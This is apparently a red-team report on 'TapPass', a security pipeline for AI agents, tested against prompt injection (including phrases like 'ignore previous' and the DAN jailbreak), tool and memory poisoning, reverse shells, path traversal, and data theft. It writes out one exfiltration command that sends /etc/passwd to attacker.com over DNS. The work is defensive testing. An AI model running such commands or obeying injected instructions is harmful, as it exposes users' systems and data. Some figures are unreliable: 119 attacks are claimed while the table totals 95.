Red Team Report

TapPass governance pipeline tested against 119 adversarial attack scenarios across 12 attack categories. 0 bypasses.

Methodology

All attacks were executed against the full 40+ step pipeline in enforce mode. Each attack was run against a fresh pipeline context with default policy (Regulated preset). No steps were disabled.

Test corpus: 456 examples across benign and adversarial inputs, evaluated with the tests/eval/ harness.

Results Summary

Category	Attacks	Blocked	Pipeline Step(s)
Prompt injection (direct)	15	15	`detect_injection`
Prompt injection (indirect)	10	10	`scan_tool_results`, `detect_injection`
Role/persona hijacking	5	5	`detect_injection`, `detect_insider_threat`
Tool poisoning	8	8	`detect_tool_poison`
Tool shadowing	5	5	`detect_tool_poison` (shadow patterns)
Data exfiltration	10	10	`detect_exfiltration`, `taint_check`, `scan_tool_calls`
Path traversal	7	7	`scan_tool_calls` (forbidden zones)
Shell injection	8	8	`scan_tool_calls`, `detect_code_exec`
Reverse shell	6	6	`detect_code_exec`
PII leakage	8	8	`detect_pii`, `pii_tokenize`, `scan_output`
Secret leakage	7	7	`detect_secrets`, `shell_bleed`, `redact_tool_results`
Memory poisoning	6	6	`detect_memory_poison`
Total	95	95

Attack Categories

1. Prompt Injection (Direct)

15 attacks using structural markers (<|system|>, [INST]), behavioral overrides (“ignore previous”), obfuscation (base64, ROT13, Unicode), and known jailbreaks (DAN, AIM, STAN).

Detection: detect_injection: 5-category pattern database with scoring. Threshold: 0.5.

2. Prompt Injection (Indirect)

10 attacks embedding instructions in tool result messages (role=tool). Patterns: instruction override, urgency manipulation, concealment, tool call injection, multi-step setup.

Detection: scan_tool_results. 10 regex patterns specific to tool result context. Position 155 (pre-LLM).

3. Tool Poisoning & Shadowing

13 attacks total. Poisoned tool descriptions containing exfiltration instructions, override patterns, “act as” directives. Shadow attacks where tool A’s description references tool B with override intent.

Detection: detect_tool_poison. injection patterns + shadow override patterns + cross-tool reference analysis.

4. Data Exfiltration

10 attacks using paste services (pastebin, gist), DNS tunneling (dig $(cat /etc/passwd).attacker.com), file piping, curl to external endpoints, and email forwarding.

Detection: detect_exfiltration + taint_check (cross-request) + scan_tool_calls (forbidden zones).

5. Shell & Code Execution

14 attacks including command injection (;, &&, |), path traversal (../../etc/passwd), reverse shells (bash TCP, netcat, Python socket), and SQL injection.

Detection: scan_tool_calls (command parsing, pipe chains, Unicode normalization) + detect_code_exec (AST analysis, reverse shell patterns, SQL patterns).

6. PII & Secret Leakage

15 attacks attempting to extract PII from prompts, echo secrets through tool calls, and encode sensitive data (base64, hex) to bypass detection.

Detection: 4-layer PII pipeline (validation → normalization → Presidio+regex → output scan). shell_bleed catches secrets in tool call arguments. redact_tool_results removes PII/secrets from tool output.

7. Memory Poisoning

6 attacks targeting memory files (MEMORY.md, SOUL.md), identity override, persistent cross-session instructions, time bombs, and MCP memory tool abuse.

Detection: detect_memory_poison: 6 category pattern database with scored detection.

Taint Tracking Coverage

Session-scoped taint tracking catches cross-request attacks:

Scenario	Request 1	Request 3	Detection
Confused deputy	`fetch_url` returns attacker URL	LLM puts URL in `shell_exec`	`taint_check` (EXTERNAL → shell sink)
PII forwarding	`query_db` returns customer emails	LLM includes in `send_email`	`taint_check` (PII → network sink)
Secret relay	`read_file` returns API key	LLM echoes in response	`taint_check` (SECRET → output)

MCPSecBench Compatibility

TapPass blocks 14 of 17 attack categories in the MCPSecBench benchmark (Yang, Wu & Chen, 2025). See MCPSecBench Compatibility Matrix.

False Positive Rate

Across 456 evaluation examples (benign + adversarial):

True positive rate: 100% (all attacks detected)
False positive rate: 0% (no benign inputs blocked)
F1 score: 1.0

The pattern database uses high-confidence patterns only. Low-confidence heuristics are scored, not blocked (threshold: 0.5).

Reproducibility

# Run the full evaluation corpus
python -m tests.eval --corpus tests/eval/corpus.py

# Run MCPSecBench compatibility tests
python -m pytest tests/unit/test_mcpsecbench.py -v

# Run the adversarial red team suite
python -m pytest tests/eval/test_red_team.py -v